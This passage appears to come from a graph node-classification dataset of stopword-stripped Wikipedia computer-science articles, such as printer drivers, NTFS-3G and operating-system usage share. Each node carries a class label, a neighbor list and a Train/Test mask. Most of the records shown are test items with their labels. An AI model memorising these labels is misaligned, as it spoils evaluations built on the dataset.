      4844,
      5356,
      9451,
      9964,
      11000,
      8443,
      9987,
      5380,
      7943,
      1807,
      278,
      3350,
      7965,
      10020,
      1834,
      7983,
      823,
      7488,
      10057,
      11082,
      2893,
      3407,
      11112,
      8557,
      6528,
      1409,
      2945,
      8068,
      3462,
      8584,
      4490,
      6028,
      10126,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      9712,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 3972,
    "label": 4,
    "text": "Physical_information_security:physical information security physical information security intersection common ground physical security information security primarily concerns protection tangible information-related assets computer systems storage media physical real-world threats unauthorized physical access theft fire flood typically involves physical controls protective barriers locks uninterruptible power supplies shredders information security controls physical domain complement logical domain encryption procedural administrative controls information security awareness compliance policies laws asset inherently valuable yet vulnerable wide variety threats malicious e.g theft arson accidental/natural e.g lost property bush fire threats materialize exploit vulnerabilities causing incidents likely adverse impacts organizations individuals legitimately utilize assets varying trivial devastating effect security controls intended reduce probability frequency occurrence and/or severity impacts arising incidents thus protecting value assets physical security involves use controls smoke detectors fire alarms extinguishers along related laws regulations policies procedures concerning use barriers fences walls doors obvious physical security controls designed deter prevent unauthorized physical access controlled area home office moats battlements mediaeval castles classic examples physical access controls bank vaults safes information security controls protect value information assets particularly information i.e intangible information content data intellectual property knowledge etc also computer telecommunications equipment storage media including papers digital media cables tangible information-related assets computer power supplies corporate mantra people greatest assets literally true sense so-called knowledge workers qualify extremely valuable perhaps irreplaceable information assets health safety measures even medical practice could therefore also classed physical information security controls since protect humans injuries diseases death perspective exemplifies ubiquity value information modern human society heavily reliant information information importance value deeper fundamental level principle subcellular biochemical mechanisms maintain accuracy dna replication could even classed vital information security controls given genes 'the information life malicious actors may benefit physical access information assets include computer crackers corporate spies fraudsters value information assets self-evident case say stolen laptops servers sold-on cash information content often far valuable example encryption keys passwords used gain access systems information trade secrets intellectual property inherently valuable valuable commercial advantages confer credit card numbers used commit identity fraud theft furthermore loss theft damage computer systems plus power interruptions mechanical/electronic failures physical incidents prevent used typically causing disruption consequential costs losses unauthorized disclosure confidential information even coercive threat disclosure damaging saw sony pictures entertainment hack end 2014 numerous privacy breach incidents even absence evidence disclosed personal information actually exploited fact longer secured control rightful owners potentially harmful privacy impact substantial fines adverse publicity/reputational damage noncompliance penalties impacts flow serious privacy breaches best avoided regardless cause several ways obtain information physical attacks exploitations examples described dumpster diving practice searching trash hope obtaining something valuable information carelessly discarded paper computer disks hardware sometimes attackers simply go building take information need frequently using strategy attacker masquerade someone belongs situation may pose copy room employee remove document someone desk copy document replace original leave copied document individuals pretending building maintenance may gain access otherwise restricted spaces might walk right building trash bag containing sensitive documents carrying portable devices storage media left desks perhaps memorized password sticky note stuck someone computer screen called colleague across open office literally shredding paper documents prior disposal commonplace physical information security control intended prevent information content media falling wrong hands digital data also shredded figurative sense either strongly encrypted repeatedly overwritten realistic probability information ever retrieved even using sophisticated forensic analysis constitutes physical information security control since purged computer storage media freely discarded sold without compromising original information content two techniques may combined high-security situations digital shredding data content followed physical shredding incineration destroy storage media many organizations restrict physical access controlled areas offices requiring people present valid identification cards proximity passes physical keys provided access tokens devices strictly controlled secure making hard unauthorized people obtain fabricate use associated electronic mechanical locks doors walls barriers etc sufficiently strong complete unauthorized physical entry controlled areas prevented protecting information assets within likewise office workers generally encouraged required obey clear desk policies protecting documents storage media including portable devices tidying away sight perhaps locked drawers filing cabinets safes vaults according risks requiring workers memorize passwords rather writing place might observed onlooker maybe colleague visitor intruder example risk avoidance computers plainly need electrical power hence vulnerable issues power cuts accidental disconnection flat batteries brown-outs surges spikes electrical interference electronic failures physical information security controls address associated risks include fuses no-break battery-backed power supplies electrical generators redundant power sources cabling remove warning signs plugs surge protectors power quality monitoring spare batteries professional design installation power circuits plus regular inspections/tests preventive maintenance ironic so-called uninterruptible power supplies often lead power interruptions inadequately specified designed manufactured used managed maintained illustration failure critical physical control",
    "neighbors": [
      6494,
      1475,
      8997,
      2534,
      11368,
      7369,
      11695,
      7090,
      9086,
      10195,
      7606,
      5373,
      2558,
      831
    ],
    "mask": "Test"
  },
  {
    "node_id": 3973,
    "label": 3,
    "text": "Westmere_(microarchitecture):westmere microarchitecture westmere formerly nehalem-c code name given 32 nm die shrink nehalem sharing cpu sockets westmere included intel hd uhd iris graphics nehalem first westmere -based processors launched january 7 2010 intel corporation westmere architecture available intel brands core i3 core i5 core i7 pentium celeron xeon westmere feature improvements nehalem reported successor nehalem westmere sandy bridge",
    "neighbors": [
      3459,
      5380,
      8325,
      9095,
      5386,
      9611,
      4108,
      5901,
      6924,
      9741,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      11417,
      5883,
      2088,
      10669,
      9391,
      9649,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      6339,
      5444,
      9541,
      6730,
      1998,
      2638,
      977,
      5073,
      2516,
      597,
      5844,
      4695,
      7134,
      1119,
      1000,
      7657,
      1260,
      4204,
      4717,
      5356,
      5871,
      8684,
      9582,
      499,
      8820,
      3317,
      10734,
      4217,
      4603,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 3974,
    "label": 2,
    "text": "Printer_driver:printer driver computers printer driver print processor piece software computer converts data printed format printer understand purpose printer drivers allow applications printing without aware technical details printer model printer drivers confused print spoolers queue print jobs send successively printer unix unix-like systems linux os x use cups short common unix printing system modular printing system unix-like computer operating systems allows computer act print server computer running cups host accept print jobs client computers process send appropriate printer printer drivers typically implemented filters usually named front end printing system printer spoolers constitute back end backends also used determine available devices startup backend asked list devices supports information available dos supports predefined character devices codice_1 codice_1 codice_1 codice_1 associated parallel printers supported system similarly serial printers used codice_1 codice_1 codice_1 codice_1 codice_1 users use commands like example codice_10 print content file printer contents transferred printer without interpretation therefore method printing either files already stored corresponding printer language generic text files without simple line-oriented formatting dos also provides dynamically loadable print spooler named print well optional support support screen captures also graphics mode graphics optional character device driver printer.sys loaded dos provides code page switching support also associated printers—different types dot matrix ink jet printers supported default beyond system-wide printer-specific drivers use application level ms-dos/pc dos dr-dos however script command loaded run background order intercept convert printer output applications postscript support ps-capable printers also applications supporting directly order support complex printing different models printers application e.g word processor may shipped printer drivers essentially descriptions printer escape sequences printers supplied drivers popular applications addition possible applications include tools editing printer description case ready driver days dos widely used many printers emulation modes epson fx-80 ibm proprinter commands many recent laser printers also emulation modes hp pcl hp laserjet postscript printers work dos appears also compatible windows 3.x microsoft windows systems printer drivers make use gdi unidrv pscript-based xps xpsdrv programs use standard apis draw text pictures screen paper printers use gdi natively commonly referred winprinters considered incompatible operating systems although software printfil make printers work dos prompt within windows win32 apis also allow applications send data directly spooler bypassing printer driver however applications actually use option printer driver usually located c \\windows\\system32\\driverstore\\filerepository folder windows machine original amigaos 1.3 supported printers standard series drivers stored required path devs printers printer drivers stored directory covered standard printers 1985-1989 circa included epson fx standard driver xerox 4020 hp etcetera amiga printer driver communicate though standard amiga printer.device default standard hardware device amiga dealing printers standard parallel.device controlled parallel port driver would control printer amiga printer drivers innovation time spared users individually configuring applications ability print 4096 colors use printer preferences program printers could connected serial port well amiga also support virtual device prt refer printer.device example command copy file prt caused file printed directly bypassing parallel.device default printer driver amiga used ansi escape codes special ones defined various printer manufacturers way every application amiga could use standard set control sequences would n't need know printer actually connected printer driver translated standard sequences special sequences certain printer understands amiga internal function pwrite printer.device writes 'length bytes directly printer function generally called printer drivers send buffer printer number buffers decided persons created driver amiga lacked standard printer spooler since amigaos 2.0 standard printer.device changed control various printers time printer preferences divided three main panels prefs printer selects main printer basic elements print spacing paper size printergfx controlled features like dithering scaling printerps controlled postscript printers printer drivers surprisingly remained almost workbench 1.3 4096 limits fact led amiga users prefer third party printer systems drivers like turboprint printstudio introduced recent drivers also featured functioning printer spooler amiga featured 16 millions colors printing morphos uses special version turboprint pilot recent printers many amiga programs like dtp programs pagestream featured past printer drivers usb printers automatically recognized poseidon usb stack stack capable detecting usb device class printers still require driver controlled addition install-able computer drivers could also present embedded firmware printers made available networking protocol e.g ipp embedded firmware printer could thus eliminate need install driver computer accepting print data general purpose format e.g pdf via networking protocol despite efforts standardize various stages printing pipeline printer interfaces largely still proprietary manufacturer-specific hence nature functions performed drivers vary nonetheless based function performed drivers classified follows drivers convert print data one general purpose format e.g pdf dvi etc another general purpose format e.g ps examples include ghostscript etc drivers convert print data one format e.g ps final device-specific format printer hardware process create print drivers act last stage delivering print job printer drivers likely embedded printer firmware examples manufacturer specific formats include install-able drivers packaged various formats ppd popular packaging format drivers accept postscript data pdf data input due dominance select operating systems operating system–driver interface standardized driver–printer interfaces hence standardization packaging formats drivers actual functions performed drivers",
    "neighbors": [
      8832,
      10885,
      5384,
      7561,
      6797,
      7696,
      5397,
      9258,
      2221,
      6830,
      1073,
      8628,
      823,
      9790,
      576,
      7626,
      3916,
      10960,
      1877,
      4836,
      10352,
      5492,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 3975,
    "label": 6,
    "text": "NTFS-3G:ntfs-3g ntfs-3g open-source cross-platform implementation microsoft windows ntfs file system read-write support ntfs-3g often uses fuse file system interface run unmodified many different operating systems runnable linux freebsd netbsd opensolaris illumos beos qnx wince nucleus vxworks haiku morphos minix macos openbsd licensed either gnu general public license proprietary license partial fork ntfsprogs active maintenance development ntfs-3g introduced one senior linux ntfs developers szabolcs szakacsits july 2006 first stable version released 2007-02-21 version 1.0 developers ntfs-3g later formed company tuxera inc. develop code ntfs-3g free community edition tuxera ntfs proprietary version ntfs-3g supports operations writing files files size created modified renamed moved deleted ntfs partitions transparent compression supported well system-level encryption support modify access control lists permissions available ntfs partitions mounted using filesystem userspace fuse interface according man page ntfs-3g supports hard links symbolic links ntfs-3g supports partial ntfs journaling unexpected computer failure leaves file system inconsistent state volume repaired 2009 volume unclean journal file recovered mounted default ‘ norecover ’ mount option used disable behavior benchmarks show driver performance via fuse comparable filesystems drivers in-kernel provided cpu powerful enough embedded old systems high processor usage severely limit performance",
    "neighbors": [
      6797,
      2193,
      788,
      5397,
      8857,
      9762,
      8228,
      7983,
      11568,
      1844,
      823,
      1978,
      321,
      3404,
      4815,
      5969,
      10851,
      1509,
      5612,
      9335,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3976,
    "label": 2,
    "text": "System_V_printing_system:system v printing system printing subsystem unix system v one several standardized systems printing unix typical commercial system v-based unix versions solaris sco openserver system running print architecture could traditionally identified use user command primary interface print system opposed bsd command though systems provide alias typical user commands available system v printing system unix programming model device files special files act access points peripheral devices printers example first line printer unix system might represented file device directory i.e using file metaphor document could printed copying file onto device worked well enough case one printer per user model scale well multiple users share one printer solution create queue spool documents printed use daemon system process manage queue send documents printer order arrived system command send documents queue first introduced 1973 version 4 unix release system v release 4 suite utilities grown include commands canceling print jobs moving jobs among queues enabling disabling queues enabling disabling job scheduler daemon status reports print system command handled queue documents printed 20 different options controlled appearance document place queue even handled email notification user document finished printing command returned job id could used cancel lpstat commands remove job queue check progress respectively system considered quite complex set administer uses expected use three commands distribution influential unix system v interface implementation became standard users control printers command included requirement posix.2 standard command name appeared subsequent lpr lprng cups printing systems svr4 derivates like sco unix command simply alias command used bsd-based system late 1996 running linux stated linux printing software consists unix standard lp lpr software 1999 support lp waning third edition simply stated lpr command prints document linux 2003 survey debian mandrake red hat slackware suse distributions showed running combination lpr lprng cups original system v printing system remains proprietary however solaris print system heavily modified original released open source software part opensolaris project common unix printing system emulates system v berkeley print architectures interface level though internal architecture different introduction simplified configuration system lp author peter gray university wollongong described several weaknesses version shipping then-current solaris operating system version 2 result gray observed many administrators choose simply run old lpr/lpd system svr4 boxes",
    "neighbors": [
      515,
      9733,
      9735,
      5256,
      521,
      6281,
      6664,
      11663,
      4369,
      5397,
      2198,
      6812,
      7196,
      4001,
      4002,
      6138,
      10149,
      2599,
      7847,
      8360,
      8236,
      4398,
      2995,
      823,
      1336,
      8504,
      7356,
      9151,
      451,
      1987,
      965,
      2245,
      8517,
      9542,
      11075,
      5706,
      3659,
      7626,
      1741,
      8522,
      3791,
      10967,
      9946,
      6369,
      8675,
      11363,
      10727,
      6120,
      491,
      8954,
      9455,
      11249,
      5106,
      8306,
      5492,
      8692,
      9204,
      10484,
      2424,
      506,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 3977,
    "label": 3,
    "text": "Macintosh_Quadra_700:macintosh quadra 700 macintosh quadra 700 personal computer designed manufactured sold apple computer inc. october 1991 march 1993 introduced alongside quadra 900 first computers quadra series using motorola 68040 processor also first computer apple housed mini-tower form factor 1991 becoming popular alternative standard desktop-on-monitor cases common 1980s quadra 700 originally list price 5,700 usd dropped 4,700 base model time replacement macintosh quadra 800 went sale early 1993 centris 650 also introduced around time offered incrementally performance quadra 700 desktop-style case price point closer 3,000 form factor quadra 700 case largely popular macintosh iicx macintosh iici models made possible users models upgrade powerful quadra 700 users sometimes placed older case vertically mini-tower orientation quadra 700 recognized apple logo model name printed vertical orientation iicx iici designed allow rubber feet moved side vertical orientation well cpu motorola 68040 25 mhz clock oscillator runs 50 mhz replacing faster oscillator 74 mhz results performance increase memory quadra 700 could upgraded 68 megabytes ram 25 mhz processor made useful computer scientific design work expansion two nubus slots pds slot processor upgrades apple manufacturers sold 700 powerpc 601 accelerator cards came along 1994 storage 80 160 mb hard disks available launch faster 230 mb unit became available mid-1993 quadra 950 introduced video like iici 700 integrated graphics built system board unlike earlier model uses dedicated vram video memory onboard video came 512 kilobytes vram soldered motherboard supported resolutions 1152x870 video memory expandable 2 megabytes via 6 256-kilobyte 100 ns vram simms vram simm expansion slots motherboard expanding video memory 2 megabytes allowed 24-bit millions color resolutions 832x624 sound sound 8-bit stereo ports i/o available dual serial ports aaui ethernet port mic db-25 scsi connector quadra 700 along 900 first macintosh models built-in support ethernet networking operating system system 7.0.1 included standard earliest macintosh model support mac os 8",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      3241,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      6539,
      5520,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 3978,
    "label": 2,
    "text": "Usage_share_of_operating_systems:usage share operating systems usage share operating systems percentage computing devices run operating system particular time figures necessarily estimates data operating system share difficult obtain reliable primary sources agreed methodologies collection personal computing platform area smartphones watches google android dominates 2.5 billion users mobile phone operating systems include apple ios kaios series 30+ area desktop laptop computers microsoft windows generally 70 markets 78 globally apple macos around 14 google chromeos 3 north america linux around 2 figures vary somewhat different markets depending gathered android battling windows used rank often popular past global scale ios never managed close half popularity windows however mobile operating systems android plus ios majority use non-mobile windows e.g macos close two years mostly android continues popular windows still countries continents mobile devices never anywhere near popular continents countries become mobile-majority still including ireland ios alone popular windows later android alone europe populous countries populous continent asia whole e.g china india excluding e.g russia still mobile-majority 56.37 public internet servers linux generally counted dominant powering twice number hosts windows server trailed many smaller players including traditional mainframe oses supercomputer field completely dominated linux 100 top500 running os according gartner following worldwide device shipments referring wholesale operating system includes smartphones tablets laptops pcs together shipments stores mean sales consumers necessarily year shipment therefore suggesting numbers indicate popularity and/or usage could misleading smartphones sell higher numbers traditional pcs also whole lot dollar value gap projected widen well double 2015 earlier gartner reports year worldwide pc shipments declined fourth consecutive year started 2012 launch tablets 8 decline pc sales 2015 including cumulative decline sales previous years gartner includes macs running macos pc sales numbers e.g ipads androids individually slight increase sales 2015 28 may 2015 google announced 1.4 billion android users 1 billion google play users active month changed 2 billion monthly active users may 2017 27 january 2016 paul thurrott summarized operating system market day apple announced one billion devices microsoft backed away goal one billion windows 10 devices three years middle 2018 reported 26 september 2016 windows 10 running 400 million devices march 2019 800 million late 2016 android e.g samsung smartphones explained killing apple ios market share i.e declining sales smartphones relatively also number units whole market increasing 9 may 2019 biggest smartphone companies market share samsung huawei apple respectively gartner press release said apple continued downward trend decline 7.7 percent second quarter 2016 decline based absolute number units underestimates relative decline market increasing along misleading 1.7 percent point decline point decline means 11.6 relative decline 14.6 12.9 although units sold apple declining almost vendor making profit smartphone sector hardware sales alone q3 2016 example captured 103.6 market profits mobile phone owners toothbrush owners mobile phones fastest growing technology history billion active mobile phones world people many 10 billion sold far less half still use explained fact people one extra work phones operating system fraction smartphones os capable running modern applications currently 3.1 billion smartphones tablets use across world tablets small fraction total generally running operating systems android ios latter popular tablets 2019 announced variant ios called ipados specifically ipad tablets development 2015 emarketer estimated beginning year tablet installed base would hit one billion first time china use 328 million google play n't serve track usa use second 156 million end year cheap tablets counted analysts goal met even excluding cumulative sales previous years conflicts statistics idc say tablet market contracted 10 2015 huawei ranked fifth big gains doubling share fourth quarter 2015 five biggest vendors except amazon fire tablets ranked third worldwide new list enabled quite tripling market share 7.9 fire os android-derivative recent data various sources published last twelve months summarized table sources monitor substantial number web sites statistics related one web site excluded android currently ranks highest windows incl xbox console systems every day week ios competes windows sweden depending day ios used ios windows 10 competing 13 windows mobile systems i.e windows phone accounts 0.51 web usage weekends ios alone topped windows us ios n't popular independent country guam unincorporated territory united states three consecutive quarters ios also highest ranked falkland islands british overseas territory one quarter plus one month overtaken android following quarter unknown strangely high countries madagascar 32.44 may due fact statcounter uses browser detection get os statistics common browsers often used version breakdown browsers madagascar shows 34.9 opera mini 4.4 popular known browser 22.1 plus e.g 3.34 opera 7.6 however browser statistics without version-breakdown opera 48.11 category small china android highest ranked operating system since january 2016 windows occasionally topped since asian continent whole android ranked highest since february 2016 android alone majority share large majority populous countries continent 84 bangladesh since august 2015 android ranked first 48.36 may 2016 african continent took big jump ahead windows 7 thereby africa joined asia mobile-majority continent china longer desktop-majority country joining india mobile-majority 71 confirming asia significant mobile-majority online usage linux kernel derivatives google systems gnu/linux exceeds windows true since time january april 2016 according w3counter statcounter however even figure unix-like oses including apple higher windows windows still dominant desktop os dominance varies region gradually lost market share desktop operating systems mobile slide noticeable us macos usage tripled 2009 2017 windows 72.76 chrome os 3.33 plus traditional linux 1.46 little openly published information device shipments desktop laptop computers gartner publishes estimates way estimates calculated openly published another source market share various operating systems statcounter basing estimate web use although may accurate also sales may overstate usage computers sold pre-installed operating system users replacing os different one due personal preference installing another os alongside using conversely sales underestimate usage counting unauthorized copies example 2009 approximately 80 software sold china comprised illegitimate copies 2007 statistics automated update ie7 registered windows computers differed observed web browser share leading one writer estimate 25–35 windows xp installations unlicensed usage share microsoft latest client operating system windows 10 slowly increasing since july/august 2016 windows 7 slight decrease time reaching around 27.15 december 2016 web analysis shows significant variation different parts world example north america usage windows xp dropped 2.06 africa still 11.02 asia 6.63 even higher china 18.21 tied windows 10 second going overtaken windows 10 conversely macos north america claims 16.82 17.52 us whereas asia 4.4 2019 stack overflow developer survey provides detail particular versions windows desktop operating system share among identifying professional developers june 2016 microsoft claimed windows 10 half market share windows installations usa uk quoted betanews digital video game distribution platform steam publishes monthly hardware software survey statistics q1 2018 mobile operating systems smartphones included google dominant android variants apple ios combined almost 100 market share smartphone penetration vs. desktop use differs substantially country countries like russia still smartphone use low 19 western countries smartphone use close 50 smartphone usage share developing countries much higher bangladesh example android smartphones 84 share mali smartphones 90 95 share year section information regional trends move smartphones clear correlation gdp per capita country country respective smartphone os market share richest countries much likely choose apple iphone google android predominant elsewhere tablet computers simply tablets became significant os market share category starting apple ipad q1 2018 ios 65.03 market share android 34.58 market share windows tablets may get classified analysts thus barely register e.g 2-in-1 pcs may get classified desktops tablets since 2016 south america cuba north america android tablets gained majority asia 2017 android slightly popular ipad 49.05 usage share october 2015 africa android tablets much popular elsewhere ipad safe margin android made steady gains becoming popular tablet operating system trend many countries already gained majority large countries india 63.25 indonesia 62.22 african continent android 62.22 first gain android majority late 2014 steady gains 20.98 august 2012 egypt 62.37 zimbabwe 62.04 south america 51.09 july 2015 peru 52.96 asia 46 nepal android gained majority lead november 2014 lost 41.35 ios 56.51 taiwan october 2016 android gained confident majority losing streak china major exception android gaining market share asia android phablets much popular android tablets similar devices get classified smartphones ipad/ios 82.84 march 2015 according statcounter web use statistics proxy use smartphones popular desktop computers globally android particular popular windows although desktop computers still popular many countries overall 44.9 first quarter 2017 smartphones popular even many developed countries countries continents desktop-minority android popular windows many e.g poland europe half countries south america many north america e.g guatemala honduras haiti countries asia africa smartphone-majority android poland turkey europe highest 57.68 62.33 respectively ireland smartphone use 45.55 outnumbers desktop use mobile whole gains majority including tablet share 9.12 spain also slightly desktop-minority july 2019 sweden desktop-minority eight weeks row range measured mobile web use varies lot country statcounter press release recognizes india amongst world leaders use mobile surf internet big countries share around 80 desktop 19.56 russia trailing 17.8 mobile use desktop rest smartphones discounting tablets first gained majority december 2016 desktop-majority lost month n't christmas-time fluke close majority smartphone majority happened march 2017 week 7–13 november 2016 smartphones alone without tablets overtook desktop first time albeit short period examples mobile-majority countries include paraguay south america poland europe turkey asia africa world still desktop-majority example united states 54.89 days however territories united states puerto rico desktop significantly majority windows 30 overtaken android 22 october 2016 subsequent weekends mobile showed majority since 27 october desktop n't majority including weekdays smartphones alone showed majority since 23 december end year share topping 58.22 christmas day mobile -majority share smartphones tablets could added giving 63.22 majority unusually high top similar high also occurred monday 17 april 2017 smartphone share slightly lower tablet share slightly higher combining 62.88 formerly according statcounter press release world turned desktop-minority 49 desktop use month mobile n't ranked higher tablet share added exceed desktop share christmas season i.e temporarily desktop-minority remains smartphone-majority weekends last two weeks december 2016 australia oceania general desktop-minority first time extended period i.e every day 23 december south america smartphones alone took majority desktops christmas day full-week-average desktop still least 58 uk desktop-minority dropped 44.02 christmas day eight days end year ireland joined european countries smartphone-majority three days christmas topping day 55.39 us desktop-minority happened three days around christmas longer four-day stretch happened november happens frequently weekends according statcounter web use statistics proxy use week 7–13 november 2016 mobile meaning smartphones alone without tablets overtook desktop first time highest ranked 52.13 27 november 2016 49.02 full week mobile-majority applies countries paraguay south america poland europe turkey continents asia africa large regions rest world still desktop-majority days united states north america whole n't us desktop-minority four days row five-day average examples desktop-minority days include uk ireland australia oceania whole fact least one country every continent turned desktop-minority least month 22 october 2016 subsequent weekends mobile shown majority previously according statcounter press release world turned desktop-minority 49 desktop use month desktop-minority stretching 18-weeks/4-months period 28 june 31 october 2016 whole july august september 2016 showed desktop-majority many long sub-periods long stretch showed desktop-minority similarly fridays saturdays sundays desktop-minority biggest continents asia africa shown vast mobile-majority long time day week well several individual countries elsewhere also turned mobile-majority poland albania turkey europe paraguay bolivia south america according statcounter web use statistics saturday 28 may 2016 day smartphones mobile statcounter counts tablets separately became used platform ranking first 47.27 desktops next day desktops slightly outnumbered mobile unless counting tablets analysts count tablets smartphones separately others desktops even tablets ipad android windows devices since sunday 27 march 2016 first day world dipped desktop-minority happened almost every week week 11–17 july 2016 world desktop-minority followed next week thereon also three-week period trend still stronger weekends e.g 17 july 2016 showed desktop 44.67 mobile 49.5 plus tablets 5.7 recent weekly data shows downward trend desktops according statcounter web use statistics proxy overall use weekends desktops worldwide lose 5 percent points e.g 51.46 15 august 2015 loss relative web use going mobile also minuscule increase tablets mostly windows 7 ranked 1st workdays declines web use shifting android lesser degree ios two continents already crossed mobile-majority android based statcounters web use statistics june 2015 asia became first continent mobile overtook desktop followed africa august nigeria mobile majority october 2011 symbian later 51 share series 40 dominating followed android dominating operating system far back october 2014 reported trend large scale press release mobile usage already overtaken desktop several countries including india south africa saudi arabia india desktop went majority july 2012 32 bangladesh desktop went majority may 2013 17 android alone accounting majority web use african countries still desktop-majority many large mobile majority including ethiopia kenya mobile usage 72 popularity mobile use worldwide driven huge popularity increase android asian countries android highest ranked operating system statistically virtually every south-east asian country also ranks popular almost every african country poland desktop-minority since april 2015 android vastly popular european countries albania turkey also crossed south america continent somewhat far losing desktop-majority paraguay lost android mobile browsing general also become hugely popular continents desktop large desktop base trend mobile clear fraction total web use analysts count tablets desktops run windows others count mobile phones vast majority tablets run so-called mobile operating system android operating system |android ios ipad ipad clear lead globally clearly lost majority android south america number eastern european countries poland lost virtually african countries lost majority twice asia gained majority back many individual countries e.g india middle east clear android majority tablets android tablets thus second popular ipad march 2015 first time us number mobile-only adult internet users exceeded number desktop-only internet users 11.6 digital population using mobile compared 10.6 using desktop also means majority 78 use desktop mobile access internet smaller countries north america haiti android gone mobile majority mobile went 72.35 64.43 february 2016 region largest android usage also largest mobile revenue file rack001.jpg|thumb| server computing |servers colocation centre |upright|right server computing |internet based servers market share measured statistical surveys publicly accessible servers web server mail server dns server internet operating systems powering servers found inspecting raw response messages method gives insight market share operating systems publicly accessible internet differences result depending sample done observations weighted usually surveys based random sample ip numbers domain names hosts organisations servers found method additionally many domains ip numbers may served one host domains may served several hosts one host several ip numbers file ibm system z10.jpg|thumb|upright|right|ibm ibm system z10|system z10 common operating system mainframes ibm z/os operating systems ibm system z generation hardware include ibm proprietary z/os linux z systems transaction processing facility|z/tpf vse operating system |z/vse z/vm gartner reported 23 december 2008 linux system z used approximately 28 customer z base expected increase 50 following five years linux system z red hat micro focus compete sell red hat enterprise linux|rhel suse linux enterprise server|sles respectively file operating systems used top 500 supercomputers.svg|thumb|upright=1.8|supercomputer os family 1993–2019 systems share according top500 field supercomputers always dominated unix unix-like operating systems linux predominating since 2017 top 500 fastest supercomputers run linux top500 project lists ranks 500 fastest supercomputer benchmark results submitted june 2017 two aix computers held rank 493 494 last non-linux systems dropped list last non-linux fastest supercomputer asci white also running aix held title november 2000 november 2001 decommissioned 2006 historically kinds unix operating systems dominated end ultimately linux remains category operating systems|*usage share operating systems category usage share|operating systems",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      9768,
      3626,
      7217,
      10803,
      7733,
      9784,
      10809,
      1083,
      10303,
      576,
      2625,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      185,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      4305,
      2259,
      7382,
      8410,
      9436,
      8413,
      1247,
      225,
      11489,
      1253,
      7403,
      9964,
      9455,
      242,
      5363,
      9466,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      7497,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      863,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      8576,
      10113,
      8069,
      3462,
      394,
      6539,
      4492,
      7057,
      11667,
      5015,
      4505,
      11673,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      1480,
      4040,
      8136,
      9166,
      10730,
      10731,
      5103,
      6128,
      5105,
      8687,
      5619,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 3979,
    "label": 8,
    "text": "Search/Retrieve_via_URL:search/retrieve via url search/retrieve via url sru standard search protocol internet search queries utilizing contextual query language cql standard query syntax representing queries sample code complete answer sru query-url url query version=1.1 operation=searchretrieve query=dc.title=darwinism cql query dc.title=darwinism",
    "neighbors": [
      10313,
      140,
      2318,
      8046,
      113,
      3191,
      119,
      8440,
      1371,
      8639
    ],
    "mask": "Train"
  },
  {
    "node_id": 3980,
    "label": 9,
    "text": "GAUSS_(software):gauss software gauss matrix programming language mathematics statistics developed marketed aptech systems primary purpose solution numerical problems statistics econometrics time-series optimization 2d- 3d-visualization first published 1984 ms-dos currently also available linux macos windows range toolboxes available gauss additional cost see https //www.aptech.com/products/gauss-applications/ complete listing products",
    "neighbors": [
      7301,
      5129,
      7945,
      2317,
      6797,
      15,
      7950,
      8079,
      2457,
      5148,
      7580,
      7326,
      5154,
      7341,
      9133,
      7983,
      6962,
      823,
      6718,
      2242,
      5830,
      5703,
      4808,
      5833,
      5450,
      8262,
      9166,
      2000,
      9944,
      2652,
      10848,
      11239,
      4840,
      363,
      5612,
      5741,
      7148,
      7924
    ],
    "mask": "Test"
  },
  {
    "node_id": 3981,
    "label": 4,
